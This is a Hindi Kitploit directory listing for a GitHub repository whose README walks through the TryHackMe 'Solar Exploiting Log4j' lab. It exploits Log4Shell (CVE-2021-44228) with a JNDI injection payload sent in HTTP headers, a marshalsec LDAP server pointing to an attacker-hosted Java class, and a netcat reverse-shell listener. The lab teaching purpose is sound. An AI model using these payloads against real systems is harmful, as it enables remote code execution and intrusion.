Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
solar-exploiting-log4j — यह रिपॉजिटरी TryHackMe पर *Solar Exploiting Log4j रूम* का विस्तृत वॉकथ्रू प्रदान करती है, जो गंभीर Log4Shell भेद्यता (CVE-2021-44228) के शोषण पर केंद्रित है। यह प्रोजेक्ट दर्शाता है कि कैसे हमलावर Java अनुप्रयोगों में असुरक्षित लॉगिंग तंत्र का लाभ उठाकर रिमोट कोड निष्पादन प्राप्त कर सकते हैं। | Kitploit
उपकरण/GitHubGitHub/lavanya2085/solar-exploiting-log4j
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

रिपॉजिटरी देखें
176 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह रिपॉजिटरी TryHackMe पर *Solar Exploiting Log4j रूम* का विस्तृत वॉकथ्रू प्रदान करती है, जो गंभीर Log4Shell भेद्यता (CVE-2021-44228) के शोषण पर केंद्रित है। यह प्रोजेक्ट दर्शाता है कि कैसे हमलावर Java अनुप्रयोगों में असुरक्षित लॉगिंग तंत्र का लाभ उठाकर रिमोट कोड निष्पादन प्राप्त कर सकते हैं।

साझा करें

🔥 Solar Exploiting Log4j - TryHackMe वॉकथ्रू

📌 रूम: Solar Exploiting Log4j

प्लेटफ़ॉर्म: TryHackMe
कठिनाई: मध्यम
विषय: Log4Shell (Log4j भेद्यता)


🧠 उद्देश्य

Log4j भेद्यता (CVE-2021-44228) का शोषण करके रिमोट कोड निष्पादन प्राप्त करें और फ़्लैग कैप्चर करें।


🛠️ उपयोग किए गए उपकरण

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 चरण 1: रिकॉनिसेंस

🔍 लक्ष्य स्कैन करें

nmap -sC -sV <TARGET_IP>

📌 निष्कर्ष

  • खुले पोर्ट: 80 (HTTP), अन्य रूम पर निर्भर
  • वेब एप्लिकेशन Java-आधारित बैकएंड पर चल रहा है

🌐 चरण 2: वेब एन्यूमरेशन

  • ब्राउज़र में वेब ऐप पर जाएँ
  • इनपुट्स के साथ इंटरैक्ट करें (लॉगिन/खोज/हेडर फ़ील्ड)
  • Burp Suite का उपयोग करके रिक्वेस्ट कैप्चर करें

💥 चरण 3: Log4j भेद्यता की पहचान करें

Log4j भेद्यता JNDI इंजेक्शन की अनुमति देती है:

${jndi:ldap://<ATTACKER_IP>:1389/a}

यदि इनपुट लॉग किया जाता है → भेद्यता मौजूद है।


⚙️ चरण 4: लिसनर सेट करें

Netcat प्रारंभ करें

nc -lvnp 4444

दुर्भावनापूर्ण LDAP सर्वर प्रारंभ करें (उदाहरण)

git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

LDAP सर्वर चलाएँ:

java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 चरण 5: पेलोड होस्ट करें

python3 -m http.server 8000

दुर्भावनापूर्ण Java क्लास बनाएँ (Exploit.class)


🚀 चरण 6: एक्सप्लॉइट ट्रिगर करें

पेलोड को असुरक्षित फ़ील्ड में इंजेक्ट करें:

${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 इस तरह के हेडर का उपयोग करें:

  • User-Agent
  • X-Api-Version

🖥️ चरण 7: रिवर्स शेल प्राप्त करें

एक बार ट्रिगर होने पर:

  • लक्ष्य Netcat लिसनर पर वापस कनेक्ट करता है
  • आपको शेल एक्सेस मिल जाता है

🔐 चरण 8: प्रिविलेज एस्केलेशन (यदि आवश्यक हो)

जाँचें:

sudo -l

इनकी तलाश करें:

  • गलत कॉन्फ़िगर किए गए SUID बाइनरी
  • लिखने योग्य फ़ाइलें
  • क्रॉन जॉब्स

🚩 चरण 9: फ़्लैग कैप्चर करें

find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 सीखी गई मुख्य अवधारणाएँ

  • Log4Shell (CVE-2021-44228)
  • JNDI इंजेक्शन
  • रिमोट कोड निष्पादन (RCE)
  • रिवर्स शेल
  • वेब शोषण

टूल डाउनलोड करें